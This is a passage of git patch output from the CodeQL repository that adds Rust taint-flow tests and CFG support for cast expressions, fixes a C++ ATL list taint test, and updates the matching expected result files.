...::B(...) [B] | semmle.label | ...::B(...) [B] | +| main.rs:57:22:57:22 | i | semmle.label | i | +| main.rs:57:22:57:22 | i | semmle.label | i | +| main.rs:57:33:57:33 | i | semmle.label | i | +| main.rs:57:33:57:33 | i | semmle.label | i | +| main.rs:72:13:72:21 | source(...) | semmle.label | source(...) | +| main.rs:72:13:72:21 | source(...) | semmle.label | source(...) | +| main.rs:73:14:73:42 | ...::C {...} [C] | semmle.label | ...::C {...} [C] | +| main.rs:73:14:73:42 | ...::C {...} [C] | semmle.label | ...::C {...} [C] | +| main.rs:73:40:73:40 | s | semmle.label | s | +| main.rs:73:40:73:40 | s | semmle.label | s | +| main.rs:74:10:74:26 | get_var_field(...) | semmle.label | get_var_field(...) | +| main.rs:74:10:74:26 | get_var_field(...) | semmle.label | get_var_field(...) | +| main.rs:74:24:74:25 | e1 [C] | semmle.label | e1 [C] | +| main.rs:74:24:74:25 | e1 [C] | semmle.label | e1 [C] | +| main.rs:85:13:85:21 | source(...) | semmle.label | source(...) | +| main.rs:85:13:85:21 | source(...) | semmle.label | source(...) | +| main.rs:86:14:86:29 | set_var_field(...) [D] | semmle.label | set_var_field(...) [D] | +| main.rs:86:14:86:29 | set_var_field(...) [D] | semmle.label | set_var_field(...) [D] | +| main.rs:86:28:86:28 | s | semmle.label | s | +| main.rs:86:28:86:28 | s | semmle.label | s | +| main.rs:89:9:89:37 | ...::D {...} [D] | semmle.label | ...::D {...} [D] | +| main.rs:89:9:89:37 | ...::D {...} [D] | semmle.label | ...::D {...} [D] | +| main.rs:89:35:89:35 | i | semmle.label | i | +| main.rs:89:35:89:35 | i | semmle.label | i | +| main.rs:89:47:89:47 | i | semmle.label | i | +| main.rs:89:47:89:47 | i | semmle.label | i | subpaths testFailures invalidSpecComponent #select | main.rs:16:10:16:20 | identity(...) | main.rs:15:13:15:21 | source(...) | main.rs:16:10:16:20 | identity(...) | $@ | main.rs:15:13:15:21 | source(...) | source(...) | -| main.rs:32:10:32:24 | get_var_pos(...) | main.rs:30:13:30:21 | source(...) | main.rs:32:10:32:24 | get_var_pos(...) | $@ | main.rs:30:13:30:21 | source(...) | source(...) | -| main.rs:47:33:47:33 | i | main.rs:43:13:43:21 | source(...) | main.rs:47:33:47:33 | i | $@ | main.rs:43:13:43:21 | source(...) | source(...) | -| main.rs:64:10:64:26 | get_var_field(...) | main.rs:62:13:62:21 | source(...) | main.rs:64:10:64:26 | get_var_field(...) | $@ | main.rs:62:13:62:21 | source(...) | source(...) | -| main.rs:79:47:79:47 | i | main.rs:75:13:75:21 | source(...) | main.rs:79:47:79:47 | i | $@ | main.rs:75:13:75:21 | source(...) | source(...) | +| main.rs:16:10:16:20 | identity(...) | main.rs:15:13:15:21 | source(...) | main.rs:16:10:16:20 | identity(...) | $@ | main.rs:15:13:15:21 | source(...) | source(...) | +| main.rs:42:10:42:24 | get_var_pos(...) | main.rs:40:13:40:21 | source(...) | main.rs:42:10:42:24 | get_var_pos(...) | $@ | main.rs:40:13:40:21 | source(...) | source(...) | +| main.rs:42:10:42:24 | get_var_pos(...) | main.rs:40:13:40:21 | source(...) | main.rs:42:10:42:24 | get_var_pos(...) | $@ | main.rs:40:13:40:21 | source(...) | source(...) | +| main.rs:57:33:57:33 | i | main.rs:53:13:53:21 | source(...) | main.rs:57:33:57:33 | i | $@ | main.rs:53:13:53:21 | source(...) | source(...) | +| main.rs:57:33:57:33 | i | main.rs:53:13:53:21 | source(...) | main.rs:57:33:57:33 | i | $@ | main.rs:53:13:53:21 | source(...) | source(...) | +| main.rs:74:10:74:26 | get_var_field(...) | main.rs:72:13:72:21 | source(...) | main.rs:74:10:74:26 | get_var_field(...) | $@ | main.rs:72:13:72:21 | source(...) | source(...) | +| main.rs:74:10:74:26 | get_var_field(...) | main.rs:72:13:72:21 | source(...) | main.rs:74:10:74:26 | get_var_field(...) | $@ | main.rs:72:13:72:21 | source(...) | source(...) | +| main.rs:89:47:89:47 | i | main.rs:85:13:85:21 | source(...) | main.rs:89:47:89:47 | i | $@ | main.rs:85:13:85:21 | source(...) | source(...) | +| main.rs:89:47:89:47 | i | main.rs:85:13:85:21 | source(...) | main.rs:89:47:89:47 | i | $@ | main.rs:85:13:85:21 | source(...) | source(...) | diff --git a/rust/ql/test/library-tests/dataflow/models/models.ql b/rust/ql/test/library-tests/dataflow/models/models.ql index 080d6b58f5c..53c3f5de4be 100644 --- a/rust/ql/test/library-tests/dataflow/models/models.ql +++ b/rust/ql/test/library-tests/dataflow/models/models.ql @@ -25,6 +25,16 @@ private class SummarizedCallableIdentity extends SummarizedCallable::Range { } } +private class SummarizedCallableCoerce extends SummarizedCallable::Range { + SummarizedCallableCoerce() { this = "repo::test::_::crate::coerce" } + + override predicate propagatesFlow(string input, string output, boolean preservesValue) { + input = "Argument[0]" and + output = "ReturnValue" and + preservesValue = false + } +} + private class SummarizedCallableGetVarPos extends SummarizedCallable::Range { SummarizedCallableGetVarPos() { this = "repo::test::_::crate::get_var_pos" } @@ -71,7 +81,7 @@ module CustomConfig implements DataFlow::ConfigSig { predicate isSink(DataFlow::Node sink) { DefaultFlowConfig::isSink(sink) } } -import ValueFlowTest +import FlowTest from PathNode source, PathNode sink where flowPath(source, sink) diff --git a/rust/ql/test/library-tests/dataflow/taint/inline-taint-flow.expected b/rust/ql/test/library-tests/dataflow/taint/inline-taint-flow.expected new file mode 100644 index 00000000000..4e4a41dfc62 --- /dev/null +++ b/rust/ql/test/library-tests/dataflow/taint/inline-taint-flow.expected @@ -0,0 +1,6 @@ +models +edges +nodes +subpaths +testFailures +#select diff --git a/rust/ql/test/library-tests/dataflow/taint/inline-taint-flow.ql b/rust/ql/test/library-tests/dataflow/taint/inline-taint-flow.ql new file mode 100644 index 00000000000..2929ae90964 --- /dev/null +++ b/rust/ql/test/library-tests/dataflow/taint/inline-taint-flow.ql @@ -0,0 +1,12 @@ +/** + * @kind path-problem + */ + +import rust +import utils.InlineFlowTest +import DefaultFlowTest +import TaintFlow::PathGraph + +from TaintFlow::PathNode source, TaintFlow::PathNode sink +where TaintFlow::flowPath(source, sink) +select sink, source, sink, "$@", source, source.toString() diff --git a/rust/ql/test/library-tests/dataflow/taint/main.rs b/rust/ql/test/library-tests/dataflow/taint/main.rs new file mode 100644 index 00000000000..d3b19f3bc52 --- /dev/null +++ b/rust/ql/test/library-tests/dataflow/taint/main.rs @@ -0,0 +1,31 @@ +// Tests for taint flow. + +fn source(i: i64) -> i64 { + 1000 + i +} + +fn sink(s: i64) { + println!("{}", s); +} + +fn addition() { + let a = source(42); + sink(a + 1); // $ MISSING: hasTaintFlow=42 +} + +fn negation() { + let a = source(17); + sink(-a); // $ MISSING: hasTaintFlow=17 +} + +fn cast() { + let a = source(77); + let b = a as u8; + sink(b as i64); // $ MISSING: hasTaintFlow=77 +} + +fn main() { + addition(); + negation(); + cast(); +} From 2ada999728d54c821be0a4eab9a66ba3647d1cc8 Mon Sep 17 00:00:00 2001 From: Simon Friis Vindum Date: Wed, 4 Dec 2024 12:56:54 +0100 Subject: [PATCH 0792/1267] Rust: Include `as` expression in CFG nodes --- rust/ql/.generated.list | 8 +-- .../internal/generated/CfgNodes.qll | 72 +++++++++++++++++++ rust/ql/lib/codeql/rust/elements/CastExpr.qll | 2 +- .../rust/elements/internal/CastExprImpl.qll | 2 +- .../elements/internal/generated/CastExpr.qll | 2 +- .../rust/elements/internal/generated/Raw.qll | 2 +- .../generated/.generated_tests.list | 2 +- .../generated/CastExpr/gen_cast_expr.rs | 2 +- rust/schema/annotations.py | 4 +- 9 files changed, 84 insertions(+), 12 deletions(-) diff --git a/rust/ql/.generated.list b/rust/ql/.generated.list index bd477792923..a553dcd1e26 100644 --- a/rust/ql/.generated.list +++ b/rust/ql/.generated.list @@ -1,4 +1,4 @@ -lib/codeql/rust/controlflow/internal/generated/CfgNodes.qll b0e9c10a3fdd62e355dcc74f9d5198e6f4d597cd957efd4dd7a3418115055c5c 14fc7e1beb4751897639c5c3a64d5eb234ff0dc753d2db0b8d4c1845a55959f0 +lib/codeql/rust/controlflow/internal/generated/CfgNodes.qll 63fcdcbe20f3c44ab5c53c5aeb109b179026a743dafb369790eb151b1cb7d3d1 9f43a3279a815153cd529638245e0a2022c6df0a7510f08198eb397bea30c049 lib/codeql/rust/elements/Abi.qll 4c973d28b6d628f5959d1f1cc793704572fd0acaae9a97dfce82ff9d73f73476 250f68350180af080f904cd34cb2af481c5c688dc93edf7365fd0ae99855e893 lib/codeql/rust/elements/Addressable.qll 13011bfd2e1556694c3d440cc34af8527da4df49ad92b62f2939d3699ff2cea5 ddb25935f7553a1a384b1abe2e4b4fa90ab50b952dadec32fd867afcb054f4be lib/codeql/rust/elements/ArgList.qll 661f5100f5d3ef8351452d9058b663a2a5c720eea8cf11bedd628969741486a2 28e424aac01a90fb58cd6f9f83c7e4cf379eea39e636bc0ba07efc818be71c71 @@ -21,7 +21,7 @@ lib/codeql/rust/elements/BreakExpr.qll 7ca3807a20e9a9a988d1fd7abebf240325ed422fc lib/codeql/rust/elements/CallExpr.qll f336500ca7a611b164d48b90e80edb0c0d3816792b0ececce659ac1ff1ffeb3e f99a9c55466418ef53860c44d9f2d6161af4b492178ddd9e5870dff742b70ae5 lib/codeql/rust/elements/CallExprBase.qll 2846202b5208b541977500286951d96487bf555838c6c16cdd006a71e383745a c789d412bf099c624329379e0c7d94fa0d23ae2edea7a25a2ea0f3c0042ccf62 lib/codeql/rust/elements/Callable.qll e1ed21a7e6bd2426f6ccd0e46cee506d8ebf90a6fdc4dca0979157da439853aa 02f6c09710116ce82157aec9a5ec706983c38e4d85cc631327baf8d409b018c6 -lib/codeql/rust/elements/CastExpr.qll cd8333612f94b47b19ea45cd0f78d62855b30e1a86d7f3052a7bec503bc8f575 198089248d838155081586f81403320ca88375bf178f8d831b0860693bb85386 +lib/codeql/rust/elements/CastExpr.qll 2fe1f36ba31fa29de309baf0a665cfcae67b61c73345e8f9bbd41e8c235fec45 c5b4c1e9dc24eb2357799defcb2df25989075e3a80e8663b74204a1c1b70e29a lib/codeql/rust/elements/ClosureBinder.qll 977df800f97cc9b03fffb5e5e1fc6acd08a2938e04cb6ad91108784a15b0d510 f6fad4127226fe1dff2f16416d8a7fde5d8ab4a88f30e443ac5e5ff618de3e05 lib/codeql/rust/elements/ClosureExpr.qll 67e2a106e9154c90367b129987e574d2a9ecf5b297536627e43706675d35eaed d6a381132ddd589c5a7ce174f50f9620041ddf690e15a65ebfb05ff7e7c02de7 lib/codeql/rust/elements/Comment.qll fedad50575125e9a64a8a8776a8c1dbf1e76df990f01849d9f0955f9d74cb2a6 8eb1afad1e1007a4f0090fdac65d81726b23eda6517d067fd0185f70f17635ab @@ -437,7 +437,7 @@ lib/codeql/rust/elements/internal/generated/BreakExpr.qll 0f428a8b2f4209b134c2ff lib/codeql/rust/elements/internal/generated/CallExpr.qll f1b8dae487077cc9d1dccf8c3cd61fd17afe860585f17ce8b860be4859be7ca4 6034fc03778e38802cdf3a6e460364b74e92912622581b31e6179951022bbbd6 lib/codeql/rust/elements/internal/generated/CallExprBase.qll cce796e36847249f416629bacf3ea146313084de3374587412e66c10d2917b83 c219aa2174321c161a4a742ca0605521687ca9a5ca32db453a5c62db6f7784cc lib/codeql/rust/elements/internal/generated/Callable.qll b0502b5263b7bcd18e740f284f992c0e600e37d68556e3e0ba54a2ac42b94934 bda3e1eea11cacf5a9b932cd72efc2de6105103e8c575880fcd0cd89daadf068 -lib/codeql/rust/elements/internal/generated/CastExpr.qll 427bfd937cd3e737c65aa121aab2a7dc166f82aaacb9a7c41a3d211d4c1dcfb0 642c8c27d4a8752744dadce45814d4e289ce02b67eb2bc2e63ff4c2e5f7825f5 +lib/codeql/rust/elements/internal/generated/CastExpr.qll ddc20054b0b339ad4d40298f3461490d25d00af87c876da5ffbc6a11c0832295 f4247307afcd74d80e926f29f8c57e78c50800984483e6b6003a44681e4a71f3 lib/codeql/rust/elements/internal/generated/ClosureBinder.qll 94c0dcdd4cd87d115659d496c88a98354bc7d4ddc0fa27028003bf7688b99987 d59d713b426dbbdb775df9092d176eea031dac1f14e468810f2fc8591399cd19 lib/codeql/rust/elements/internal/generated/ClosureExpr.qll 34149bf82f107591e65738221e1407ec1dc9cc0dfb10ae7f761116fda45162de fd2fbc9a87fc0773c940db64013cf784d5e4137515cc1020e2076da329f5a952 lib/codeql/rust/elements/internal/generated/Comment.qll cd1ef861e3803618f9f78a4ac00516d50ecfecdca1c1d14304dc5327cbe07a3b 8b67345aeb15beb5895212228761ea3496297846c93fd2127b417406ae87c201 @@ -531,7 +531,7 @@ lib/codeql/rust/elements/internal/generated/PtrTypeRepr.qll 51d1e9e683fc79dddbff lib/codeql/rust/elements/internal/generated/PureSynthConstructors.qll e5b8e69519012bbaae29dcb82d53f7f7ecce368c0358ec27ef6180b228a0057f e5b8e69519012bbaae29dcb82d53f7f7ecce368c0358ec27ef6180b228a0057f lib/codeql/rust/elements/internal/generated/RangeExpr.qll 23cca03bf43535f33b22a38894f70d669787be4e4f5b8fe5c8f7b964d30e9027 18624cef6c6b679eeace2a98737e472432e0ead354cca02192b4d45330f047c9 lib/codeql/rust/elements/internal/generated/RangePat.qll 80826a6a6868a803aa2372e31c52a03e1811a3f1f2abdb469f91ca0bfdd9ecb6 34ee1e208c1690cba505dff2c588837c0cd91e185e2a87d1fe673191962276a9 -lib/codeql/rust/elements/internal/generated/Raw.qll f52ff91f985848ca0e251efee1e246ae80fdca13f530df301f7090a5b18bcf13 136a84549b183d222fb6063d34d4b714b7dd42f6eb3f756894285bf405c24a22 +lib/codeql/rust/elements/internal/generated/Raw.qll 7ffb00a545dfe16556b60a92f118c1175544f07ece90b7f46db2c119a2481753 e6fd9bb3da185bcfbb55f477f0ef31f689df7d66b76bcf93e29e020a67f07f42 lib/codeql/rust/elements/internal/generated/RecordExpr.qll eb6cb662e463f9260efae1a6ce874fa781172063b916ef1963f861e9942d308d 1a21cbccc8f3799ff13281e822818ebfb21d81591720a427cac3625512cb9d40 lib/codeql/rust/elements/internal/generated/RecordExprField.qll 7e9f8663d3b74ebbc9603b10c9912f082febba6bd73d344b100bbd3edf837802 fbe6b578e7fd5d5a6f21bbb8c388957ab7210a6a249ec71510a50fb35b319ea1 lib/codeql/rust/elements/internal/generated/RecordExprFieldList.qll 179a97211fe7aa6265085d4d54115cdbc0e1cd7c9b2135591e8f36d6432f13d3 dd44bbbc1e83a1ed3a587afb729d7debf7aeb7b63245de181726af13090e50c0 diff --git a/rust/ql/lib/codeql/rust/controlflow/internal/generated/CfgNodes.qll b/rust/ql/lib/codeql/rust/controlflow/internal/generated/CfgNodes.qll index b28dd64d66e..fcdc33679cd 100644 --- a/rust/ql/lib/codeql/rust/controlflow/internal/generated/CfgNodes.qll +++ b/rust/ql/lib/codeql/rust/controlflow/internal/generated/CfgNodes.qll @@ -703,6 +703,66 @@ module MakeCfgNodes Input> { int getNumberOfAttrs() { result = count(int i | exists(this.getAttr(i))) } } + final private class ParentCastExpr extends ParentAstNode, CastExpr { + override predicate relevantChild(AstNode child) { + none() + or + child = this.getExpr() + } + } + + /** + * A type cast expression. For example: + * ```rust + * value as u64; + * ``` + */ + final class CastExprCfgNode extends CfgNodeFinal, ExprCfgNode { + private CastExpr node; + + CastExprCfgNode() { node = this.getAstNode() } + + /** Gets the underlying `CastExpr`. */ + CastExpr getCastExpr() { result = node } + + /** + * Gets the `index`th attr of this cast expression (0-based). + */ + Attr getAttr(int index) { result = node.getAttr(index) } + + /** + * Gets any of the attrs of this cast expression. + */ + Attr getAnAttr() { result = this.getAttr(_) } + + /** + * Gets the number of attrs of this cast expression. + */ + int getNumberOfAttrs() { result = count(int i | exists(this.getAttr(i))) } + + /** + * Gets the expression of this cast expression, if it exists. + */ + ExprCfgNode getExpr() { + any(ChildMapping mapping).hasCfgChild(node, node.getExpr(), this, result) + } + + /** + * Holds if `getExpr()` exists. + */ + predicate hasExpr() { exists(this.getExpr()) } + + /** + * Gets the type representation of this cast expression, if it exists. + */ + TypeRepr getTypeRepr() { result = node.getTypeRepr() } + + /** + * Holds if `getTypeRepr()` exists. + */ + predicate hasTypeRepr() { exists(this.getTypeRepr()) } + } + final private class ParentConstBlockPat extends ParentAstNode, ConstBlockPat { override predicate relevantChild(AstNode child) { none() @@ -3305,6 +3365,18 @@ module MakeCfgNodes Input> { cfgNode ) or + pred = "getExpr" and + parent = + any(Nodes::CastExprCfgNode cfgNode, CastExpr astNode | + astNode = cfgNode.getCastExpr() and + child = getDesugared(astNode.getExpr()) and + i = -1 and + hasCfgNode(child) and + not child = cfgNode.getExpr().getAstNode() + | + cfgNode + ) + or pred = "getBlockExpr" and parent = any(Nodes::ConstBlockPatCfgNode cfgNode, ConstBlockPat astNode | diff --git a/rust/ql/lib/codeql/rust/elements/CastExpr.qll b/rust/ql/lib/codeql/rust/elements/CastExpr.qll index f7a892e7399..968a6062a15 100644 --- a/rust/ql/lib/codeql/rust/elements/CastExpr.qll +++ b/rust/ql/lib/codeql/rust/elements/CastExpr.qll @@ -9,7 +9,7 @@ import codeql.rust.elements.Expr import codeql.rust.elements.TypeRepr /** - * A cast expression. For example: + * A type cast expression. For example: * ```rust * value as u64; * ``` diff --git a/rust/ql/lib/codeql/rust/elements/internal/CastExprImpl.qll b/rust/ql/lib/codeql/rust/elements/internal/CastExprImpl.qll index d44836596fb..b074e737931 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/CastExprImpl.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/CastExprImpl.qll @@ -13,7 +13,7 @@ private import codeql.rust.elements.internal.generated.CastExpr module Impl { // the following QLdoc is generated: if you need to edit it, do it in the schema file /** - * A cast expression. For example: + * A type cast expression. For example: * ```rust * value as u64; * ``` diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/CastExpr.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/CastExpr.qll index dda6547fabb..a3725ff1a45 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/CastExpr.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/CastExpr.qll @@ -17,7 +17,7 @@ import codeql.rust.elements.TypeRepr */ module Generated { /** - * A cast expression. For example: + * A type cast expression. For example: * ```rust * value as u64; * ``` diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/Raw.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/Raw.qll index 03d9f253a60..17b3344b091 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/Raw.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/Raw.qll @@ -1387,7 +1387,7 @@ module Raw { /** * INTERNAL: Do not use. - * A cast expression. For example: + * A type cast expression. For example: * ```rust * value as u64; * ``` diff --git a/rust/ql/test/extractor-tests/generated/.generated_tests.list b/rust/ql/test/extractor-tests/generated/.generated_tests.list index b39bf6b63ee..2410d9237d0 100644 --- a/rust/ql/test/extractor-tests/generated/.generated_tests.list +++ b/rust/ql/test/extractor-tests/generated/.generated_tests.list @@ -13,7 +13,7 @@ BlockExpr/gen_block_expr.rs 17b06c726e304e0efcfde8e71afd9c657860312be55436689423 BoxPat/gen_box_pat.rs 1493e24b732370b577ade38c47db17fa157df19f5390606a67a6040e49b501c0 1493e24b732370b577ade38c47db17fa157df19f5390606a67a6040e49b501c0 BreakExpr/gen_break_expr.rs aacdf9df7fc51d19742b9e813835c0bd0913017e8d62765960e06b27d58b9031 aacdf9df7fc51d19742b9e813835c0bd0913017e8d62765960e06b27d58b9031 CallExpr/gen_call_expr.rs 013a7c878996aefb25b94b68eebc4f0b1bb74ccd09e91c491980817a383e2401 013a7c878996aefb25b94b68eebc4f0b1bb74ccd09e91c491980817a383e2401 -CastExpr/gen_cast_expr.rs abd59cc7b92578b56098ac0045cf7de4b15c645cce79e3bdad8d3b6f4657360d abd59cc7b92578b56098ac0045cf7de4b15c645cce79e3bdad8d3b6f4657360d +CastExpr/gen_cast_expr.rs c3892211fbae4fed7cb1f25ff1679fd79d2878bf0bf2bd4b7982af23d00129f5 c3892211fbae4fed7cb1f25ff1679fd79d2878bf0bf2bd4b7982af23d00129f5 ClosureBinder/gen_closure_binder.rs 78d3219bdfc58a22f333e3c82468fc23001e92b1d5acb085de7f48d7d1722244 78d3219bdfc58a22f333e3c82468fc23001e92b1d5acb085de7f48d7d1722244 ClosureExpr/gen_closure_expr.rs 15bd9abdb8aaffabb8bb335f8ebd0571eb5f29115e1dc8d11837aa988702cd80 15bd9abdb8aaffabb8bb335f8ebd0571eb5f29115e1dc8d11837aa988702cd80 Comment/gen_comment.rs 1e1f9f43161a79c096c2056e8b7f5346385ab7addcdec68c2d53b383dd3debe6 1e1f9f43161a79c096c2056e8b7f5346385ab7addcdec68c2d53b383dd3debe6 diff --git a/rust/ql/test/extractor-tests/generated/CastExpr/gen_cast_expr.rs b/rust/ql/test/extractor-tests/generated/CastExpr/gen_cast_expr.rs index 2945c711320..ba0ed150d0b 100644 --- a/rust/ql/test/extractor-tests/generated/CastExpr/gen_cast_expr.rs +++ b/rust/ql/test/extractor-tests/generated/CastExpr/gen_cast_expr.rs @@ -1,6 +1,6 @@ // generated by codegen, do not edit fn test_cast_expr() -> () { - // A cast expression. For example: + // A type cast expression. For example: value as u64; } diff --git a/rust/schema/annotations.py b/rust/schema/annotations.py index 9ee94e99c25..025b0f566ba 100644 --- a/rust/schema/annotations.py +++ b/rust/schema/annotations.py @@ -448,10 +448,10 @@ class _: """ -@annotate(CastExpr) +@annotate(CastExpr, cfg = True) class _: """ - A cast expression. For example: + A type cast expression. For example: ```rust value as u64; ``` From 70a296be895df6c1e80c8fa2320cfcd4ba11c981 Mon Sep 17 00:00:00 2001 From: Simon Friis Vindum Date: Wed, 4 Dec 2024 13:24:15 +0100 Subject: [PATCH 0793/1267] Rust: Add string slice taint flow test --- .../dataflow/taint/TaintFlowStep.expected | 0 .../dataflow/taint/TaintFlowStep.ql | 4 ++++ .../test/library-tests/dataflow/taint/main.rs | 19 +++++++++++++++++++ 3 files changed, 23 insertions(+) create mode 100644 rust/ql/test/library-tests/dataflow/taint/TaintFlowStep.expected create mode 100644 rust/ql/test/library-tests/dataflow/taint/TaintFlowStep.ql diff --git a/rust/ql/test/library-tests/dataflow/taint/TaintFlowStep.expected b/rust/ql/test/library-tests/dataflow/taint/TaintFlowStep.expected new file mode 100644 index 00000000000..e69de29bb2d diff --git a/rust/ql/test/library-tests/dataflow/taint/TaintFlowStep.ql b/rust/ql/test/library-tests/dataflow/taint/TaintFlowStep.ql new file mode 100644 index 00000000000..5eebf4b347d --- /dev/null +++ b/rust/ql/test/library-tests/dataflow/taint/TaintFlowStep.ql @@ -0,0 +1,4 @@ +import codeql.rust.dataflow.DataFlow +import codeql.rust.dataflow.internal.TaintTrackingImpl + +query predicate additionalTaintStep = RustTaintTracking::defaultAdditionalTaintStep/3; diff --git a/rust/ql/test/library-tests/dataflow/taint/main.rs b/rust/ql/test/library-tests/dataflow/taint/main.rs index d3b19f3bc52..9029b883dc7 100644 --- a/rust/ql/test/library-tests/dataflow/taint/main.rs +++ b/rust/ql/test/library-tests/dataflow/taint/main.rs @@ -24,8 +24,27 @@ fn cast() { sink(b as i64); // $ MISSING: hasTaintFlow=77 } +mod string { + fn source(i: i64) -> String { + format!("{}", i) + } + + fn sink(s: &str) { + println!("{}", s); + } + + pub fn string_slice() { + let s = source(35); + let sliced = &s[1..3]; + sink(sliced); // $ MISSING: hasTaintFlow=35 + } +} + +use string::*; + fn main() { addition(); negation(); cast(); + string_slice(); } From 8d035e61a3b744d9a878c18661e2f14e685b780f Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 4 Dec 2024 12:33:02 +0000 Subject: [PATCH 0794/1267] C++: Fix test. --- .../dataflow/taint-tests/atl.cpp | 32 +++--- .../dataflow/taint-tests/localTaint.expected | 102 +++++++++--------- .../taint-tests/test_mad-signatures.expected | 17 +++ 3 files changed, 84 insertions(+), 67 deletions(-) diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index a6638ad3f56..05d14c06c36 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -347,52 +347,52 @@ void test_CAtlList() { int* p = indirect_source(); { - CAtlList list(10); + CAtlList list(10); sink(list.GetHead()); - list.AddHead(x); + list.AddHead(p); sink(list.GetHead()); // $ ir - CAtlList list2(10); + CAtlList list2(10); list2.AddHeadList(&list); sink(list2.GetHead()); // $ ir - CAtlList list3(10); - list3.AddTail(x); + CAtlList list3(10); + list3.AddTail(p); sink(list3.GetHead()); // $ ir - CAtlList list4(10); + CAtlList list4(10); list4.AddTailList(&list3); sink(list4.GetHead()); // $ ir { - CAtlList list5(10); - auto pos = list5.Find(x, list5.GetHeadPosition()); + CAtlList list5(10); + auto pos = list5.Find(p, list5.GetHeadPosition()); sink(list5.GetAt(pos)); // $ MISSING: ir } { - CAtlList list6(10); - list6.AddHead(x); + CAtlList list6(10); + list6.AddHead(p); auto pos = list6.FindIndex(0); sink(list6.GetAt(pos)); // $ ir } { - CAtlList list7(10); + CAtlList list7(10); auto pos = list7.GetTailPosition(); - list7.InsertAfter(pos, x); + list7.InsertAfter(pos, p); sink(list7.GetHead()); // $ ir } { - CAtlList list8(10); + CAtlList list8(10); auto pos = list8.GetTailPosition(); - list8.InsertBefore(pos, x); + list8.InsertBefore(pos, p); sink(list8.GetHead()); // $ ir } { - CAtlList list9(10); - list9.SetAt(list9.GetHeadPosition(), x); + CAtlList list9(10); + list9.SetAt(list9.GetHeadPosition(), p); sink(list9.GetHead()); // $ ir } } diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected index 41c3822aed5..a35e1c53d1c 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected @@ -299,13 +299,6 @@ WARNING: module 'TaintTracking' has been deprecated and may be removed in future | atl.cpp:296:11:296:21 | call to source | atl.cpp:331:30:331:30 | x | | | atl.cpp:296:11:296:21 | call to source | atl.cpp:338:31:338:31 | x | | | atl.cpp:296:11:296:21 | call to source | atl.cpp:343:44:343:44 | x | | -| atl.cpp:296:11:296:21 | call to source | atl.cpp:352:18:352:18 | x | | -| atl.cpp:296:11:296:21 | call to source | atl.cpp:360:19:360:19 | x | | -| atl.cpp:296:11:296:21 | call to source | atl.cpp:369:29:369:29 | x | | -| atl.cpp:296:11:296:21 | call to source | atl.cpp:375:21:375:21 | x | | -| atl.cpp:296:11:296:21 | call to source | atl.cpp:383:30:383:30 | x | | -| atl.cpp:296:11:296:21 | call to source | atl.cpp:390:31:390:31 | x | | -| atl.cpp:296:11:296:21 | call to source | atl.cpp:395:44:395:44 | x | | | atl.cpp:298:24:298:25 | 10 | atl.cpp:298:24:298:26 | call to CAtlList | TAINT | | atl.cpp:298:24:298:26 | call to CAtlList | atl.cpp:299:10:299:13 | list | | | atl.cpp:298:24:298:26 | call to CAtlList | atl.cpp:300:5:300:8 | list | | @@ -406,12 +399,19 @@ WARNING: module 'TaintTracking' has been deprecated and may be removed in future | atl.cpp:343:19:343:23 | ref arg list9 | atl.cpp:344:12:344:16 | list9 | | | atl.cpp:343:19:343:23 | ref arg list9 | atl.cpp:345:5:345:5 | list9 | | | atl.cpp:344:12:344:16 | ref arg list9 | atl.cpp:345:5:345:5 | list9 | | -| atl.cpp:350:24:350:25 | 10 | atl.cpp:350:24:350:26 | call to CAtlList | TAINT | -| atl.cpp:350:24:350:26 | call to CAtlList | atl.cpp:351:10:351:13 | list | | -| atl.cpp:350:24:350:26 | call to CAtlList | atl.cpp:352:5:352:8 | list | | -| atl.cpp:350:24:350:26 | call to CAtlList | atl.cpp:353:10:353:13 | list | | -| atl.cpp:350:24:350:26 | call to CAtlList | atl.cpp:356:24:356:27 | list | | -| atl.cpp:350:24:350:26 | call to CAtlList | atl.cpp:398:3:398:3 | list | | +| atl.cpp:348:12:348:31 | call to indirect_source | atl.cpp:352:18:352:18 | p | | +| atl.cpp:348:12:348:31 | call to indirect_source | atl.cpp:360:19:360:19 | p | | +| atl.cpp:348:12:348:31 | call to indirect_source | atl.cpp:369:29:369:29 | p | | +| atl.cpp:348:12:348:31 | call to indirect_source | atl.cpp:375:21:375:21 | p | | +| atl.cpp:348:12:348:31 | call to indirect_source | atl.cpp:383:30:383:30 | p | | +| atl.cpp:348:12:348:31 | call to indirect_source | atl.cpp:390:31:390:31 | p | | +| atl.cpp:348:12:348:31 | call to indirect_source | atl.cpp:395:44:395:44 | p | | +| atl.cpp:350:25:350:26 | 10 | atl.cpp:350:25:350:27 | call to CAtlList | TAINT | +| atl.cpp:350:25:350:27 | call to CAtlList | atl.cpp:351:10:351:13 | list | | +| atl.cpp:350:25:350:27 | call to CAtlList | atl.cpp:352:5:352:8 | list | | +| atl.cpp:350:25:350:27 | call to CAtlList | atl.cpp:353:10:353:13 | list | | +| atl.cpp:350:25:350:27 | call to CAtlList | atl.cpp:356:24:356:27 | list | | +| atl.cpp:350:25:350:27 | call to CAtlList | atl.cpp:398:3:398:3 | list | | | atl.cpp:351:10:351:13 | ref arg list | atl.cpp:352:5:352:8 | list | | | atl.cpp:351:10:351:13 | ref arg list | atl.cpp:353:10:353:13 | list | | | atl.cpp:351:10:351:13 | ref arg list | atl.cpp:356:24:356:27 | list | | @@ -421,37 +421,37 @@ WARNING: module 'TaintTracking' has been deprecated and may be removed in future | atl.cpp:352:5:352:8 | ref arg list | 